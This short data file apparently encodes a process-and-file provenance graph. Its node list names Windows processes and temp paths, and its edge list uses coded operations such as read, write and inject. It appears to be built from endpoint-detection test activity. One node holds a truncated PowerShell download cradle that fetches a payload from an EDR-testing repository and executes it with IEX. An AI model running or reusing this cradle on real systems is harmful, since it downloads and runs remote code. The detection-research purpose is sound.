12
MP*-javaw.exe
TP*-ntvdm.exe 
MP-RegDll.x86.exe
MF-C:\Users\admin\AppData\Local\Temp\XClient
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-C:\Windows\System32\WScript
MF-C:\Users\admin\Desktop\script
MF-.\T1027.004\src\calc.cs
MP*-OriginalBuild.exe.exe 
TP*-rundll32.exe
MF-C:\Users\admin\AppData\Local\Temp\nscB9BA
MF-%userprofile%\downloads
22
0 1 FR-1
0 2 UK-1
1 3 RD-2
1 4 ST-2
1 5 WR-2
1 6 RD-2
1 7 WR-2
1 8 IJ-2
8 3 CD-3
4 8 RF-2
8 5 WR-3
8 6 WR-3
8 7 RD-3
1 9 IJ-2
9 3 RD-4
9 4 ST-4
9 5 WR-4
9 6 WR-4
9 7 WR-4
8 9 UK-3
1 10 WR-2
1 11 WR-2

